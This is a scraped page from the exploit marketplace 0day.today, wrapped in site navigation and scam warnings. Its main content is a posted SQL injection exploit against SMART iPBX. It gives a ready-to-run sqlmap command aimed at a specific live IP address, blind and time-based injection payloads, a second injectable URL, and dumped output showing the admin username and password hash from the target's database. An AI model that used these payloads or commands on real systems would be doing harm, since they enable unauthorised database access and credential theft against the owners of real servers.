0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SMART iPBX SQL Injection Vulnerability
SMART iPBX - Multiple Sql Injection =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://softmatica.com.do/softmatica/?p=216 #################################################################### Multiple Sql Injection ======================= [1] Time-Based Blind Injection [POST] sqlmap.py -u "http://190.6.141.106/login_validator.php" --data="user=AXT&pass=AXT&login=Entrar" -p "user" --level=5 --risk=5 -D asterisk -T user -C id,level,username,password --dump Place: POST Parameter: user Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: user=-AXT' OR (4281=4281)#&pass=AXT&login=Entrar Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment) Payload: user=AXT' AND 5746=BENCHMARK(5000000,MD5(0x6f464d48))#&pass=AXT&login=Entrar --- web server operating system: Linux CentOS 5.8 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL 5 Database: asterisk Table: user [1 entry] +----+---------+----------+------------------------------------------+ | id | level | username | password | +----+---------+----------+------------------------------------------+ | 1 | 9 | admin | 21232f297a57a5a743894a0e4a801fc3 | +----+---------+----------+------------------------------------------+ [2] Classic Sql injection http://190.6.141.106/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1 # 0day.today [2024-11-15] #